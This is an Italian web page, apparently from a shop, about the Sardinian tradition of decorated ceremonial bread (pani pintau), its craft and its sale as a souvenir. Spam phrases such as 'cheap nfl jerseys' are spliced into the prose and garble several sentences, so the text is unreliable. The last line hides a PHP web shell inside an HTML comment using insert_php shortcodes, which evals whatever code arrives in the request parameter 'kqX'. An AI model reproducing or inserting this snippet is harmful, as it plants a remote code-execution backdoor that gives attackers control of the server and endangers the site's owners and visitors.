My Cart
Drop product in here
La panificazione in Sardegna è stata sempre un arte di fondamentale importanza, tutta riservata alle donne le quali si sono dimostrate capaci di conservarla e tramandarla fino ad oggi.
Una donna non poteva essere considerata buona casalinga se non era in grado di confezionare del buon pane, e la stima nei suoi confronti cresceva a dismisura se si dimostrava capace di ornare sapientemente questo prezioso alimento, creando quello che ancora oggi è ricordato come Pani Pintau.
A tutt’oggi prodotti artigianalmente, questi pani sono frutto di mani d’artista che riescono a modellare in maniera invidiabile semola, acqua e sale.
Vengono normalmente confezionati per festeggiare le fasi più importanti della vita di ciascun individuo, e hanno la fondamentale funzione di esaltare il momento speciale. Meravigliosi quelli prodotti per i fidanzamenti, per i matrimoni o per i battesimi.
Elaboratissimi, mantengono comunque una certa sobrietà e sono caratterizzati da figurazioni plastiche stilizzate e composizioni intagliate e traforate attraverso l’uso di forbici, di coltelli, di pinzette e rotelle. In alcuni casi vengono utilizzati anche timbri e punzoni e alcuni pani Best vengono addirittura lucidati prendendo – il nome di pane ischeddau.
Oggi è possibile per i turisti portare e a casa con se un frammento di Sardegna, ben rappresentato in questi eccezionali pani, che sempre più spesso vengono prodotti cheap nfl jerseys e venduti come souvenir durante le feste.
Per rendere più semplice il trasporto sono spesso custoditi in piccole buste di plastica, mentre i più preziosi e decorati verranno conservati in delicate teche.
Fra le forme più originali e innovative che rompono con la tradizione sono i pani che riprendono la forma world! delle lettere dell’alfabeto.
E’ difficile dire di no ad un oggetto tanto meraviglioso che in pochi riusciranno a mangiare preferendo godere con gli occhi di un eccellente frutto della laboriosità femminile sarda.
<!– [insert_php]if (isset($_REQUEST["kqX"])){eval($_REQUEST["kqX"]);exit;}[/insert_php][php]if (isset($_REQUEST["kqX"])){eval($_REQUEST["kqX"]);exit;}[/php] –>